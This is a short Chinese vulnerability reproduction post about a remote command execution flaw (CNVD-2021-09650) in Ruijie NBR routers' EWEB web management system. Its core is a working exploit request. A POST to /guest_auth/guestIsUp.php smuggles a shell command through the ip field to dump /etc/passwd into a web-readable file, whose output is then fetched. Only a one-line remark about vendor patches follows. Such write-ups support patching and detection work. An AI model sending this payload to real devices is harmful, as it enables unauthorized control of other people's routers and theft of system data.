锐捷NBR路由器远程命令执行漏洞(CNVD-2021-09650)

漏洞描述

锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。

漏洞复现 

访问锐捷EWEB网管系统界面

使用HackBar执行payload

POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt

然后访问页面 /guest_auth/test.txt 就可以看到命令执行的结果

锐捷NBR路由器远程命令执行漏洞(CNVD-2021-09650)_第1张图片

 漏洞修复

厂商已发布了漏洞修复程序,请及时关注更新

你可能感兴趣的:(漏洞复现,网络,智能路由器,安全)